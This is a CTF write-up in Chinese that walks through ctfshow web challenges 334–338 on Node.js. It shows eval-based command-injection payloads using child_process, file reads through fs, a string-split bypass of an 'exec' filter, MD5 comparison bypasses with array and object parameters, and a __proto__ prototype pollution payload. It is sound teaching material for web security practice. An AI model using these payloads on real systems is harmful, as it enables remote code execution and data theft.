web334
下载附件后解压
有两个文件:login.js user.js
//login.js
var findUser = function(name, password){
return users.find(function(item){
return name!=='CTFSHOW' && item.username === name.toUpperCase() && item.password === password;
});
};
//user.js
module.exports = {
items: [
{username: 'CTFSHOW', password: '123456'}
]
};
他这里name不能等于CTFSHOW,但是获得flag的条件是user等于CTFSHOW,password等于123456,但是toUpperCase可以将小写转换成大写。另外:
toUpperCase() 函数,字符 ı 会转变为 I ,字符 ſ 会变为 S 。
toLowerCase() 函数中,字符 İ 会转变为 i ,字符 K 会转变为 k 。
所以可以用username=ctfshow和password=123456绕过
web335
源代码发现有个
先试试?eval=ls,输出一个404找不到文件,所以这里可能是去include一个文件之类的
但是测试一下发现连index.php都找不到,所以再测试一下eval=1输出了1
在nodejs中,eval()方法用于计算字符串,并把它作为脚本代码来执行,语法为“eval(string)”;如果参数不是字符串,而是整数或者是Function类型,则直接返回该整数或Function。
Node.js中的child_process.exec调用的是/bash.sh,它是一个bash解释器,可以执行系统命令。
在eval函数的参数中可以构造require('child_process').exec('');来进行调用。
/084908.png)
发现返回的是[object Object]
查看文档:https://nodejs.cn/api/child_process.html
/085757.png)
法一:系统命令
?eval=require('child_process').execSync('ls')
?eval=require('child_process').spawnSync('ls').output
?eval=require('child_process').spawnSync('cat',['fl00g.txt']).stdout
?eval=require('child_process').execFileSync('ls')
?eval=require('child_process').execFileSync('ls',['-a'])
//execFileSync只能执行ls之类,cat不了文件
法二:文件操作
?eval=require('fs').readdirSync('.')
?eval=require('fs').readFileSync('fl00g.txt')
web336
法一:
经过测试发现这里屏蔽了exec,我们可以利用其他函数绕过
eval=require('child_process').spawnSync('ls').output
?eval=require('child_process').spawnSync('cat',['fl001g.txt']).output
?eval=require('fs').readdirSync('.')
?eval=require('fs').readFileSync('fl001g.txt')
法二:
__filename 表示当前正在执行的脚本的文件名。它将输出文件所在位置的绝对路径,且和命令行参数所指定的文件名不一定相同。 如果在模块中,返回的值是模块文件的路径。 __dirname 表示当前执行脚本所在的目录。
于是传?eval=__filename可以看到路径为/app/routes/index.js
然后传eval=require(‘fs’).readFileSync(‘/app/routes/index.js’,’utf-8’)可以发现过滤了exec和load
/111645.png)
我们可以像ssti一样绕过:
require("child_process")['exe'%2B'cSync']('ls')
web337
var express = require('express');
var router = express.Router();
var crypto = require('crypto');
function md5(s) {
return crypto.createHash('md5')
.update(s)
.digest('hex');
}
/* GET home page. */
router.get('/', function(req, res, next) {
res.type('html');
var flag='xxxxxxx';
var a = req.query.a;
var b = req.query.b;
if(a && b && a.length===b.length && a!==b && md5(a+flag)===md5(b+flag)){
res.end(flag);
}else{
res.render('index',{ msg: 'tql'});
}
});
module.exports = router;
我们自己通过测试可以发现,不同的传参方式会有不同的效果:
控制台 浏览器页面
?a=[1] //[1] [1]
?a[]=1 //['1'] 1
?a[x]=1 //{x:1} [object Object]
?a=[1,2,3] //[1,2,3]
?a[]=[1,2,3] //['1,2,3']
法一:
?a[]=1&b[]=1 //js中数组比较是比较内存引用对象
法二:
?a[x]=1&b[v]=2 //{x:1}+flag{xxx}=={v:2}+flag{xxx}==[object Object]flag{xxx}
注:a[0]=1&b[0]=2是不行的,因为这样相当于创建了一个数组a=[1]和b=[2]
法三:
通过测试发现:
console.log(5+[6]) //56
console.log("5"+[6]) //56
console.log(5+[3,6]) //53,6
所以可以这样绕过:
?a[]=1&b=1
web338
先看源码:
login.js:
var express = require('express');
var router = express.Router();
var utils = require('../utils/common');
/* GET home page. */
router.post('/', require('body-parser').json(),function(req, res, next) {
res.type('html');
var flag='flag_here';
var secert = {};
var sess = req.session;
let user = {};
utils.copy(user,req.body);
if(secert.ctfshow==='36dboy'){
res.end(flag);
}else{
return res.json({ret_code: 2, ret_msg: '登录失败'+JSON.stringify(user)});
}
});
module.exports = router;
其中还require了一个utils/common:
module.exports = {
copy:copy
};
function copy(object1, object2){
for (let key in object2) {
if (key in object2 && key in object1) {
copy(object1[key], object2[key])
} else {
object1[key] = object2[key]
}
}
}
分析可知,只要secert.ctfshow===’36dboy’就可以得到flag,我们没法操作secert,但我们可以通过操作user变量,达到原型链污染
这里先看到利用点,这里copy的意思就是将object1和object2对比,如果存在没有的属性,就会将属性和值给object1,这里他user和secert对象都是指向Object.prototype,所以只要user.proto.ctfshow等于36dboy就可以了
payload
{"__proto__":{"ctfshow":"36dboy"}}
/150925.png)
web339
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。